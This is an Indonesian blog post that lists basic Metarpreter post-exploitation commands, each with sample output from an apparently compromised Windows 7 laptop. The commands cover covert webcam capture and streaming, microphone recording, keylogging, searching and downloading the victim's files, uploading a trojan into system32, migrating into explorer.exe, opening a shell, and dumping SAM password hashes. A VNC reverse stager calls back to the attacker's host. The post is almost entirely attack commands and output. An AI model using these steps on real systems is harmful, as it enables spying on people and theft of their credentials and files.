Perintah - Perintah dasar Meterpreter Metasploit
Pada postingan kali ini saya akan membagikan beberapa perintah-perintah yang dapat dijalankan ketika kita sudah mendapatkan sesi meterpreter dari target yang kita exploit.
Kebetulan kemarin ada yang bertanya juga apa yang bisa kita lakukan jika sudah mendapat sesi meterpreter, jika kita tau perintah-perintahnya banyak yang bisa dilakukan, seperti menjalankan program yang ada di sistem target, mengirim file atau mengambil file-file yang ada di sistem target. nah di bawah ini akan saya berikan beberapa contoh perintah - perintah dasar meterpreter di metasploit
help
Perintah ini digunakan untuk melihat semua menu meterpreter
meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter scriptbackground
Perintah ini digunakan untuk mengirimkan sesi meterpreter berjalan sebagai background
meterpreter > background [*] Backgrounding session 1... msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
sysinfo
Perintah ini digunakan untuk melihat informasi sistem target
meterpreter > sysinfo Computer : SAMSUNG OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/win32
run vnc
Perintah ini digunakan untuk remote sistem target
meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.100 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Users\Samsung\AppData\Local\Temp\sccHTQrAIy.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.1.100:4545...
webcam_list
Perintah ini digunakan untuk melihat list webcam yang ada
meterpreter > webcam_list 1: ManyCam Virtual Webcam 2: HP Webcam-50 meterpreter > webcam_snap
Perintah ini digunakan untuk mengambil gambar dari webcam
meterpreter > webcam_snap [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/PZegxMLF.jpeg meterpreter >
webcam_stream
Perintah ini digunakan untuk streaming secara langsung dari webcam target
meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: GHqixCls.html [*] Streaming... record_mic
Perintah ini digunkan untuk mengambil rekaman suara dari microphone target, tambahkan opsi -d utuk menentukan interfal
meterpreter > record_mic -d 10 [*] Starting... [*] Stopped Audio saved to: /root/UqxrMpys.wav meterpreter >
run keylogrecorder
Perintah ini digunakan untuk merekam aktifitas keyboard pada sistem target, tekan Ctrl+C untuke berhenti
meterpreter > run keylogrecorder [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.103_20160229.0841.txt [*] Recording ^C[*] Saving last few keystrokes [*] Interrupt [*] Stopping keystroke sniffer... meterpreter >
geteuid
perintah ini digunakan untuk melihat user server yang sedang berjalan
meterpreter > getuid Server username: Samsung\Samsung meterpreter > getsid
Perintah ini digunakan untuk mendapatkan SID dari user server yang sedang berjalan
meterpreter > getsid Server SID: S-1-5-21-341670393-1752858153-726497755-1000 meterpreter >
Search
Perintah untuk mencari sebuah file yang ada di sistem target, gunakan opsi -f untuk mencari file dengan format tertentu
meterpreter > search -f .pdf Found 50 results... C:\Users\Samsung\Documents\CV.PDF (136731 bytes) C:\Users\Samsung\DocumentsHowTo.pdf (570012 bytes) C:\Users\Samsung\Documents\pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf (149072 bytes) C:\Users\Samsung\Documents\TUTORIAL VERIFIKASI PIN ADSENSE.pdf (1170899 bytes)
'pwd' dan 'cd'
pwd digunakan untuk melihat dimana letak kita berada di direktory target, dan cd untuk masuk ke sebuah direktory
meterpreter > pwd C:\ meterpreter > cd Users meterpreter > pwd C:\Users meterpreter > ls
Sama dengan perintah pada terminal linux, ini digunakan untuk melihat list dari suatu direktory
meterpreter > ls Listing: C:\Users\Samsung\Documents ====================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2016-02-09 17:41:36 +0700 Bluetooth Folder 100666/rw-rw-rw- 136731 fil 2015-11-24 03:55:43 +0700 CV.PDF 100666/rw-rw-rw- 1992 fil 2016-02-03 17:26:41 +0700 Default.rdp 100666/rw-rw-rw- 73216 fil 2016-01-16 17:22:29 +0700 Drawing1 FLOW EGA.vsd 100666/rw-rw-rw- 570012 fil 2015-12-02 17:39:08 +0700 HowTo.pdf 100666/rw-rw-rw- 1170899 fil 2015-12-14 19:50:58 +0700 TUTORIAL VERIFIKASI PIN ADSENSE.pdf 100666/rw-rw-rw- 8251365 fil 2015-11-23 14:11:54 +0700 Untitled.pdf 40777/rwxrwxrwx 0 dir 2015-11-23 11:09:39 +0700 penggajian_Taruna_Karya 100666/rw-rw-rw- 149072 fil 2015-12-06 21:53:04 +0700 pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf 100666/rw-rw-rw- 20505 fil 2016-01-12 14:56:55 +0700 recruitingindo511.docx meterpreter > download
Perintah ini digunakan untuk mengambil file dari sistem target
meterpreter > download Default.rdp /root/Desktop/ [*] downloading: Default.rdp -> /root/Desktop/Default.rdp [*] download : Default.rdp -> /root/Desktop/Default.rdp meterpreter >
/root/Desktop merupakan letak dimana file akan disimpan
upload
Perintah ini digunakan untuk mengirim sebuah file ke sistem target, dengan direktory yang ditetukan
meterpreter > upload trojan.exe c:\\windows\\system32 [*] uploading : trojan.exe -> c:\windows\system32 [*] uploaded : trojan.exe -> c:\windows\system32\trojan.exe meterpreter >
cat
Sama seperti perintah umumnya pada linux, ini digunakan untuk menampilkan isi dari sebuah file
meterpreter > cat Usage: cat file meterpreter > cat Anherr.txt Perintah Perintah dasar Meterpreter by Anherr Blog's meterpreter > mkdir
Perintah ini digunakan untuk membuat sebuah folder
meterpreter > mkdir Anherr Creating directory: Anherr meterpreter >
Kita juga dapat menggunkan peritah
cp untuk mengcopy file
rm untuk menghapus file
rmdir untuk menghapus suatu direktory
ipconfig
Perintah ini digunakan untuk meliha ip target secara keseluruhan
meterpreter > ipconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11 ============ Name : Qualcomm Atheros AR9485 802.11b/g/n WiFi Adapter Hardware MAC : 55:7d:68:15:dd:ef MTU : 1500 IPv4 Address : 192.168.1.103 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::cdb0:307a:4cdc:71e4 IPv6 Netmask : ffff:ffff:ffff:ffff::
netstat
Perintah ini digunakan untuk menampilkan koneklsi jaringan pada sistem target
meterpreter > netstat Connection list =============== Proto Local address Remote address State User Inode PID/Program name ----- ------------- -------------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 808/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 480/wininit.exe tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 904/svchost.exe tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 984/svchost.exe tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 608/services.exeps
Perintah ini digunakan untuk meliha list prosses yang sedang berjalan pada target
meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System 276 smss.exe 376 Ath_CoexAgent.exe 2968 taskhost.exe x86 1 Samsung\Samsung C:\Windows\system32\taskhost.exe 2976 dwm.exe x86 1 Samsung\Samsung C:\Windows\system32\Dwm.exe 3024 explorer.exe x86 1 Samsung\Samsung C:\Windows\Explorer.EXE
migrate
Perintah ini digunakan untuk berpindah ke prosses yang lain
meterpreter > migrate 3024 [*] Migrating from 1192 to 3024... [*] Migration completed successfully. meterpreter >
execute
Perintah untuk mengeksekusi, contoh untuk menjalankan cmd.exe
meterpreter > execute -f cmd.exe Process 316 created. meterpreter >
shell
Perintah ini digunakan untuk mendapatkan shell dari sistem target, layaknya Command Prompt
meterpreter > shell Process 3456 created. Channel 3 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>
hashdump
Perintah ini digunakan untuk dump database SAM
meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\>
Itulah beberapa contoh dari perintah-perintah meterpreter di metasploit, sebetulnya masih ada lagi namun akan banyak jika ditulis semua, hehe , silahkan ketik help pada meterpreter untuk melihat semua list yang ada
Cukup itu dulu yang dapat saya bagikan kali ini , semoga bermanfaat
sumber www.offensive-security.com
...